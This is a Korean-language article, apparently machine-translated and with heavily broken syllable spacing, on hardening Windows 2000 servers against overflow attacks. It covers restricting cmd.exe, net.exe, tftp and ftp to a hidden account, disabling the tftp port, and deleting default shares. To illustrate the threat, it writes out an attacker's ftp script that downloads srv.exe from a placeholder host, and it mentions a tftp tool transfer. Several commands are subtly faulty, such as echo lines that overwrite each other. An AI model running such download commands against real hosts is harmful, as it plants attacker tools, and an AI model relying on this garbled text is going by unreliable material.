안전 고수:넘 치 는 공격 을 멀리 합 니 다.

나 는 해커 나 안전 에 접촉 하 는 친구 가 있 으 면 넘 치 는 공격 이나 이런 단 어 를 접 한 적 이 있다 고 믿는다.즉,넘 치 는 공격 과 고수 들 이 발표 한 넘 치 는 프로그램 이 있어 서 그렇게 많은'패스트푸드 해커'가 생 겼 다 는 것 이다.부인 할 수 없습니다.넘 치 는 공격 은 해커 나 보안 검색 요원 에 게 도 호스트 테스트 를 할 때 취 하 는 수단 입 니 다.넘 치 는 공격 이 성공 하면 상대방 호스트 의 일정한 권한 을 신속하게 얻 을 수 있 기 때 문 입 니 다.그러나 우 리 는 넘 치면 즐 겁 습 니 다.그러나 네트워크 관 리 는 그 는 비참 합 니 다.특히 중요 한 데 이 터 를 보호 하 는 호스트 가 만약 에 양심 이 없 는 해커 나 해 킹 이 라 고 해 야 합 니 다.그들 이 침입 한 후에 데 이 터 를 대량으로 삭제 합 니 다.백업 수량 이 있 든 없 든 손실 이 매우 심각 하기 때문에 효과적으로 패 치 를 하 는 것 도 좋 은 방법 입 니 다.그런데 가끔 잊 어 버 리 시 나 요?모 르 거나,상대방 이 사용 하 는 것 이 0day Exploit 일 수도 있 습 니 다!그래서 패 치 는 효과 가 있 지만 유일한 방법 은 아니다.그러나 나 는 한 안전 잡 지 를 볼 때 한 소 가 cmd.exe 에 권한 을 설정 하면 넘 치 는 것 을 효과적으로 방지 할 수 있다 고 말 했다.게다가 내 가 일부 고수 들 과 교류 할 때 이것 을 말 하면 그들 도 이론 적 으로 통할 수 있다 고 말 했 지만 그들 은 나 에 게 해 보라 고 했다.- -\#자,더 이상 쓸데없는 말 하지 말고 넘 치지 않도록 어떻게 해 야 할 지 말 해 보 자.여러분,망 관리 잘 보 세 요!우선,우 리 는 사용 자 를 만 들 수 있 습 니 다.이름 은 CmdUser 이 고 비밀 번 호 는 튼튼 하 게 설정 할 수 있 습 니 다.그리고 완벽 을 추구 하면 사용자 의 이름 앞 에$를 추가 할 수 있 습 니 다.인터넷 에서 발표 한 방법 에 따라 숨겨 진 계 정 을 만 들 수 있 습 니 다.그러면 침입 을 하 더 라 도 net user cmduser passworld 를 사용 하여 이 사용자 의 비밀 번 호 를 수정 하지 않 습 니 다.기억 하 세 요.그 사용 자 는 user 등급 이 어야 합 니 다!사용 자 를 만 든 후 c:\winnt\system 32 로 갑 니 다.(이 시스템 은 CD 에 설치 되 어 있 습 니 다)cmd.exe 를 찾 아 오른쪽 단 추 를 누 르 면 속성 을 엽 니 다.안전 한 곳 에 있 습 니 다.그림 에서 보 듯 이우리 가 해 야 할 일 은 모든 사용 자 를 삭제 한 다음 에 CmdUser 라 는 사용 자 를 추가 하 는 것 입 니 다.완 성 된 후에 확인 하면 됩 니 다.하지만 이렇게 하면 된다 고 생각 하지 마 세 요.그리고 net.exe 를 찾 아야 합 니 다.이것 도 cmd.exe 방법 에 따라 설정 합 니 다.여러분 이 net.exe 를 찾 았 을 때 옆 에 net1.exe 가 있 는 것 을 발 견 했 습 니 다.이것 도 설정 해 야 합 니 다.설정 되 어 있 습 니 다.한숨 돌 렸 다 고 생각 하지 마 세 요.사실은 이렇게 하면 초보 해커 들 을 상대 할 수 있 지만 상대방 이 늙 은 새 라면 tftp 를 통 해또는 ftp 등 으로 로 컬 넘 치 는 넘 치 는 프로그램 을 전송 합 니 다.우 리 는 game over 입 니 다.또는 그 가 목 마 를 올 리 거나 서 비 스 를 교체 하 는 방법 을 이용 하 는 것 도 막 을 수 없습니다.아마도 독자 들 이 물 어 볼 것 입 니 다.당신 이 제기 한 이상 해결 방법 이 있 는 것 이 아 닙 니까?좋 습 니 다!약간의 방법 이 라 고 할 수 있 습 니 다.다음은 tftp 의 방법 을 말씀 드 리 겠 습 니 다.이것 은 아주 간단 합 니 다.C:\WINNT\system 32\drivers\etc 에 들 어가 서 수첩 으로 services 라 는 파일 을 엽 니 다.그림 2 참조tftp 라 는 포트 를 0 으로 수정 합 니 다.이렇게 하면 침입 하면 tftp CI Host get files.exe 파일 을 사용 하여 자신의 도 구 를 전송 하지 않 습 니 다.물론,더 좋 은 안전성 을 위해 서,우 리 는 tftp.exe 라 는 파일 을 검색 한 후에 tftp 라 는 실행 파일 을 cmd 에 따라 실행 할 수 있 습 니 다.exe 처럼 cmduser 라 는 사용자 만 사용 할 수 있 도록 추가 합 니 다.다음은 또 다른 방법 을 말씀 드 리 겠 습 니 다.ftp 를 이용 해 물건 을 다운로드 하 라 는 명령 을 기억 하 실 거 라 고 믿 습 니 다.뭐라고 요?너 몰라?제 가 말씀 드 리 겠 습 니 다:echo open xxx.xxx.xxx>ftp.txt echo user>ftp.txt echo password>ftp.txt echo get srv.exe>ftp.txt echo by>ftp.txt ftp-s:ftp.txt del ftp.txt 이렇게 하면 srv.exe 라 는 소프트웨어 를 다운로드 할 수 있 습 니 다.cmd 방법 에 따라 ftp 의 사용 권한 을 cmduser 에 배분 할 수 있 습 니 다.이렇게 하면 상대방 에 게 소프트웨어 를 올 리 는 것 을 피 할 수 있 습 니 다.사실은 올 릴 수 있 는 방법 이 많 지만 저 는 독자 에 게 생각 을 남 겼 습 니 다.그래 야 우 리 는 자신의 기술 을 향상 시 킬 수 있 기 때 문 입 니 다.또한,일부 친구 들 은 다음 스 크 립 트 를 이용 하여 ipc$기본 공 유 를 닫 을 수 있 습 니 다.@echo off net share c$/del net share d$/del net share e e$/del net share f$/del net share ipc$/del net share admin$/del@cls 하지만 우리 가 이렇게 설정 하면 귀 찮 을 수 있 습 니 다.그래서 우 리 는 맨 뒤에 net start explorer 를 추가 해서 켜 기 스 크 립 트 를 만 드 는 것 이 좋 을 것 같 습 니 다.왜 가능 하 다 고 말 합 니까?나 는 시간 관계 때문에 미 처 실험 하지 못 했 습 니 다.실험 에 성공 한 친구 가 포럼 에 가서 당신 의 견 해 를 발표 하 기 를 바 랍 니 다!다음 에 기회 가 된다 면 sql injection 을 어떻게 방지 하 는 지 말씀 드 리 겠 습 니 다.시험 과정 에서 궁금 한 점 이 있다 면 이메일 to 를 환영 합 니 다[email protected]